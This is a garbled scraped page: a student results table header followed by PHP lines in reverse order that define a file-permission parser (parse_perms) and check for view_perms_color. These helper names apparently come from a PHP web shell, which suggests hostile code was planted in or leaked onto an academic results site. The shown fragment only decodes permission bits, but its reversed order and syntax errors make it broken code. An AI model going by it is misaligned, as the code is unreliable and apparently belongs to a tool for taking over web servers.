Student Name Roll No. Reg. No Course Name Gread Point
if (!function_exists("view_perms_color"))
}
}
return array("t"=>$t "w"=>$w);
$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
else {$t = "?";}
elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
if (($mode & 0xC000) === 0xC000) {$t = "s";}
{
function parse_perms($mode)
{
if (!function_exists("parse_perms"))
}